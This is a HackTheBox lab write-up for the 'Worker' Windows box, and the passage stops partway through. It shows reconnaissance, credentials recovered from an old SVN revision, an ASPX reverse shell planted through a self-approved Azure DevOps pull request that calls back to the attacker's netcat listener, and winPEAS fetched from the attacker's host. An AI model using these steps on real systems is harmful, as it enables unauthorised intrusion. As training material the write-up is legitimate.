-
Notifications
You must be signed in to change notification settings - Fork 0
/
worker.html
175 lines (148 loc) · 44.6 KB
/
worker.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Worker - HackTheBox Writeup (10.10.10.203) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Worker - HackTheBox Writeup (10.10.10.203)">
<meta name="description" content="Medium-difficulty Windows box with a focus on exploiting Azure DevOps environment.">
<meta property="og:description" content="Medium-difficulty Windows box with a focus on exploiting Azure DevOps environment.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/13358d0b09074485f107f36625b50a5c.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/13358d0b09074485f107f36625b50a5c.png"></span>
</div>
<h1 class="Header__Title">Worker - HackTheBox Writeup (10.10.10.203)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Wed, Feb 3, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Windows">Windows</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--brown">
<a href="tag/SVN">SVN</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Azure_DevOps">Azure DevOps</a>
</span>
</div>
<div>
Medium-difficulty Windows box with a focus on exploiting Azure DevOps environment.
</div>
</header>
<article id="https://www.notion.so/2317ef12c2e040cb8d8e23059ced56ee" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/74121678886c4c86b9354482f58806fb" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/74121678886c4c86b9354482f58806fb"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/4b118958c4b048b4a54dfc09e669bfda" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/0cd37a6b956145dfbe3f8572eb1888b9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.203 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/d4266d66cd944afd8e03f5381038b5f5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman</span></span></span></code></pre></li><li id="https://www.notion.so/312a355b4073472192c6b98eaad9955a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/4efe8a750f9d4c048a53f67697baa476" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 80,3690,5985 10.10.10.203 > scan.nmap</code></span></span></p></div><pre id="https://www.notion.so/cf02e918a8144a24ab876e2784fa89c2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows</span></span></span></code></pre><div id="https://www.notion.so/ee5e5043905e4a8397b52e6a94dc9741" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">IIS HTTP, Subversion, HTTP/WinRM (?).</span></span></p></div></li></ul><h2 id="https://www.notion.so/fda378c5076f4b269491ac705a73ae1c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/fda378c5076f4b269491ac705a73ae1c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/c547f245dba54ed79b8cb7256018b81d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Brute force directories with DirBuster: Found nothing.</span></span></li><li id="https://www.notion.so/2adafbbf0f31492b9ffef1a2ea6ec1f7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Scan SVN with nmap's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svn-brute</code></span><span class="SemanticString"> script:</span></span><div id="https://www.notion.so/e4d54a955d514960abb73104b25ab473" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p 3690 --script svn-brute 10.10.10.203</code></span></span></p></div><pre id="https://www.notion.so/b42ba6276e0f441793ffe85b6c8a3487" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
3690/tcp open svn
|_svn-brute: No repository specified (see svn-brute.repo)</span></span></span></code></pre></li><li id="https://www.notion.so/a84e996223fe4c93832207afeb313a77" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">No repository is specified, rescan using repo path </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svn-brute.repo=/svn/</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/5b529a58d6df4a0b960b3ed088e7954f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p 3690 --script svn-brute --script-args svn-brute.repo=/svn/ 10.10.10.203</code></span></span></p></div><pre id="https://www.notion.so/ddbb9c40258943de90ddc6ed35ea6b23" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
3690/tcp open svn
| svn-brute:
|_ Anonymous SVN detected, no authentication needed</span></span></span></code></pre><div id="https://www.notion.so/e020f299b18f401fa270812a5231a201" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">No auth needed on SVN.</span></span></p></div></li><li id="https://www.notion.so/9614610d16a7401fb099aaf3c6fb9de7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checkout repo:</span></span><div id="https://www.notion.so/34d4732983be439f9c2d951218a24277" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ svn checkout svn://10.10.10.203</code></span></span></p></div></li><li id="https://www.notion.so/ae8e0078feef47e4a9ac3d14130f6f71" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found repo name and possible domain name: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dimension.worker.htb</code></span></span></li><li id="https://www.notion.so/b8ef4b57764340ebba28114f8004ccf3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found file: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">moved.txt</code></span></span><div id="https://www.notion.so/faa1c9f3496c4aa9a93283f6a04261ab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat moved.txt</code></span></span></p></div><pre id="https://www.notion.so/f7f9fb01cda24e758786a17c0338e0e3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://devops.worker.htb/"><span>http://devops.worker.htb</span></a></span><span class="SemanticString"><span>
// The Worker team :)</span></span></span></code></pre></li><li id="https://www.notion.so/2fdd3d6de4184fd7848cd71a6ebe9c7e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found domain name: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">devops.worker.htb</code></span></span></li><li id="https://www.notion.so/7db06fec262a447c859a065333c5372b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Adding found domains to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/329557d131d444199cf337c60cf614ab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">10.10.10.203 devops.worker.htb dimension.worker.htb</code></span></span></p></div></li><li id="https://www.notion.so/eb1f62f5d267478e8e05c46e96bf59a4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigate to new domains:</span></span><div id="https://www.notion.so/6ec198eb5794408f81ea3230d6b51605" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">devops.worker.htb</code></span><span class="SemanticString"> is a Azure DevOps server.</span></span></p></div><pre id="https://www.notion.so/72ca4887e0a046de87d581be696c84a7" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>TF400813: Resource not available for anonymous access. Client authentication required.</span></span></span></code></pre><div id="https://www.notion.so/eb3a6ac056a04f1b973ec581dfaa58b6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dimension.worker.htb</code></span><span class="SemanticString"> is a standard webserver with links to projects.</span></span></p></div></li><li id="https://www.notion.so/8f014d8b60654468ae5e350650a48631" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found more domains on </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dimension.worker.htb</code></span><span class="SemanticString">:
</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://alpha.worker.htb/">http://alpha.worker.htb/
</a></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://cartoon.worker.htb/">http://cartoon.worker.htb/
</a></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://lens.worker.htb/">http://lens.worker.htb/
</a></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://solid-state.worker.htb/">http://solid-state.worker.htb/
</a></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://spectral.worker.htb/">http://spectral.worker.htb/
</a></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://story.worker.htb/">http://story.worker.htb/</a></span></span></li><li id="https://www.notion.so/c11c0b48892b43e89d0e84120c7e5cd9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found hidden directory </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.svn</code></span><span class="SemanticString">, with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">./wc.db</code></span><span class="SemanticString"> database file</span></span></li><li id="https://www.notion.so/76f73abf02ea4b38a7c2157727a81380" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found possible username: nathen</span></span></li><li id="https://www.notion.so/fb36d468bb9c4c6392c299c479573448" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checkout older version of repo:</span></span><div id="https://www.notion.so/781c54401e5542b59899bb17dc42308b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ svn co -r 2 svn://10.10.10.203</code></span></span></p></div></li><li id="https://www.notion.so/b3f8dc0c097f4a2f9f4a58a18f908095" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">./deploy.ps1</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/edcd390b62e84be490ec1c6ccf495417" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat deploy.ps1</code></span></span></p></div><pre id="https://www.notion.so/2941002895774606b68fac8a2d769477" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token variable">$user</span> = <span class="token string">"nathen"</span>
<span class="token variable">$plain</span> = <span class="token string">"wendel98"</span>
<span class="token variable">$pwd</span> = <span class="token punctuation">(</span><span class="token variable">$plain</span> <span class="token punctuation">|</span> <span class="token function">ConvertTo-SecureString</span><span class="token punctuation">)</span>
<span class="token variable">$Credential</span> = <span class="token function">New-Object</span> System<span class="token punctuation">.</span>Management<span class="token punctuation">.</span>Automation<span class="token punctuation">.</span>PSCredential <span class="token variable">$user</span><span class="token punctuation">,</span> <span class="token variable">$pwd</span>
<span class="token variable">$args</span> = <span class="token string">"Copy-Site.ps1"</span>
<span class="token function">Start-Process</span> powershell<span class="token punctuation">.</span>exe <span class="token operator">-</span>Credential <span class="token variable">$Credential</span> <span class="token operator">-</span>ArgumentList <span class="token punctuation">(</span><span class="token string">"-file <span class="token variable">$args</span>"</span><span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/065579e2a95e4e9981915214f0fee48d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found credentials: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nathen:wendel98</code></span></span></li><li id="https://www.notion.so/800973f3ebc741438f19f7c5299bb777" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Try to login to Azure DevOps with credentials, success.</span></span></li><li id="https://www.notion.so/79c0b12288e74c06b7d8a263863657df" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Try to evil-winrm with credentials, failed to connect.</span></span></li></ul><h2 id="https://www.notion.so/5eeb2af0793a4bd8abfb7a29c052d0f3" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/5eeb2af0793a4bd8abfb7a29c052d0f3"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/4ca3ec982d1b428ca3cca76d26d317b7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Azure DevOps has a feature to upload files onto repositories, but it must be done with a pull request on a separate branch.</span></span></li><li id="https://www.notion.so/c7b5586eddad4fce94dcd98ca6224391" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using ASPX shell, modify the file to include local address and port.</span></span><div id="https://www.notion.so/0a1ac9c412544727887c8f21eee29771" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nano ./shell.aspx</code></span></span></p></div><pre id="https://www.notion.so/c1caf86c994b4e619d7dd468bef97f65" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token class-name">String</span> host <span class="token operator">=</span> <span class="token string">"10.10.14.45"</span><span class="token punctuation">;</span>
<span class="token class-name"><span class="token keyword">int</span></span> port <span class="token operator">=</span> <span class="token number">6969</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/14e9b295059446f09946bcdb3f35ce68" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Upload the shell onto a new branch of the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">alpha</code></span><span class="SemanticString"> repo in the Hotel project, make sure to link the PR to a work item, create one if needed.</span></span></li><li id="https://www.notion.so/deb04ca935fb49639f92de5d3359e7c0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Self-approve PR and commit to master.</span></span><div id="https://www.notion.so/30edc991f2814017b8952ed060c8748c" class="Image Image--PageWidth"><figure><a href="https://i.imgur.com/HTQK3Ih.png?width=1227"><img src="https://i.imgur.com/HTQK3Ih.png?width=1227" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/8d18a2316fc6446297da5c51132c35fc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse shell with netcat:</span></span><div id="https://www.notion.so/4ecb54e1cccd44ab8488a00e1ac18c92" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969</code></span></span></p></div></li><li id="https://www.notion.so/b5d9292fc1c54b5db70b0ad8dd37578d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigate to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://alpha.worker.htb/shell.aspx">http://alpha.worker.htb/shell.aspx</a></span></span></li><li id="https://www.notion.so/be75c71580bf4adc8e0b47adf2eaeba5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get shell under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">iis</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/5ebc77b9b626457bbd8b0d812be31d8e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ id</code></span></span></p></div><pre id="https://www.notion.so/a23ac8c3887442179f2a471605958555" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>uid=4294967295(Unknown+User) gid=4294967295(Unknown+Group)</span></span></span></code></pre><div id="https://www.notion.so/cceea9259d8e49849c990994914aa7bf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami</code></span></span></p></div><pre id="https://www.notion.so/8b88166ada5145a1b7aa1a1ec9cef2db" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>iis apppool\defaultapppool</span></span></span></code></pre></li><li id="https://www.notion.so/77bfb5c19a0647a995dfc8df9d39ea93" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found usernames in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\Users</code></span><span class="SemanticString">: restorer, robisl</span></span></li><li id="https://www.notion.so/b9b56c16faa64c7a868a3a312c93a48b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Host winPEAS.exe on local HTTP:</span></span><div id="https://www.notion.so/40765402a0f842be950848827415e353" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cp ./winPEAS.exe ../Worker/www/</code></span></span></p></div><div id="https://www.notion.so/a5095bfffbac418a869a95155f284bdf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 -m SimpleHTTPServer</code></span></span></p></div></li><li id="https://www.notion.so/8b147f4680184a5d907e90323b3cc098" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">curl from host to local HTTP:</span></span><div id="https://www.notion.so/3085ea976c7b48038a935a973f8e7f5f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cd C:\Users\Public\Downloads\</code></span></span></p></div><div id="https://www.notion.so/17bbdccb32524abba89e03ff6ab2bb39" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl</code></span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.14.54:9090/winPEAS.exe">http://10.10.14.54:8000/winPEAS.exe</a></code></span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> winPEAS.exe</code></span></span></p></div></li><li id="https://www.notion.so/8fdd3e7159c1463aa7ef4636f38b2cbe" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Run winPEAS.exe:</span></span><div id="https://www.notion.so/0eeeae82e8d846e0ac22f52724079050" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ winPEAS.exe</code></span></span></p></div><pre id="https://www.notion.so/f001675f88334c86a62b005cd556be78" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Looking AppCmd.exe
[?] </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe"><span>https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe</span></a></span><span class="SemanticString"><span>
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
IPC$ (Path: )
W$ (Path: W:\)</span></span></span></code></pre></li><li id="https://www.notion.so/b20d55f4b7374445b35dabeb51b741d9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Try to connect to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">W$</code></span><span class="SemanticString"> share with smbclient:</span></span><div id="https://www.notion.so/3ff7bebe3cc4436fbeea965f0cd79933" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ smbclient -L 10.10.10.203</code></span></span></p></div><div id="https://www.notion.so/a036cbff8a1a4c4b8bfc42ff0d5be493" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Failed to connect.</span></span></p></div></li><li id="https://www.notion.so/92a326c161484b1c9f55856a3fd807a6" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Investigate mysterious </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">W:\</code></span><span class="SemanticString"> drive:</span></span><pre id="https://www.notion.so/d11a5674a20a44d6a6703ca8e8329b95" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Drives Information
[?] Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users [AppendData/CreateDirectories])
W:\ (Type: Fixed)(Volume label: Work)(Filesystem: NTFS)(Available space: 17 GB)(Permissions: Users [AppendData/CreateDirectories])</span></span></span></code></pre></li><li id="https://www.notion.so/b35a47fc60da4610b39eeb9f85a30c4f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Go to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">W:\</code></span><span class="SemanticString">:
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ W:</code></span></span></li><li id="https://www.notion.so/4ad3c15f3c384b558ff1fed695f8acbd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">W:\svnrepos\www\conf\authz</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/0a7db865d7ad44ff9d916232bb84fa74" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[aliases]
# joe = /C=XZ/ST=Dessert/L=Snake City/O=Snake Oil, Ltd./OU=Research Institute/CN=Joe Average
[groups]
# harry_and_sally = harry,sally
# harry_sally_and_joe = harry,sally,&joe
# [/foo/bar]
# harry = rw
# &joe = r
# * =
# [repository:/baz/fuz]
# @harry_and_sally = rw
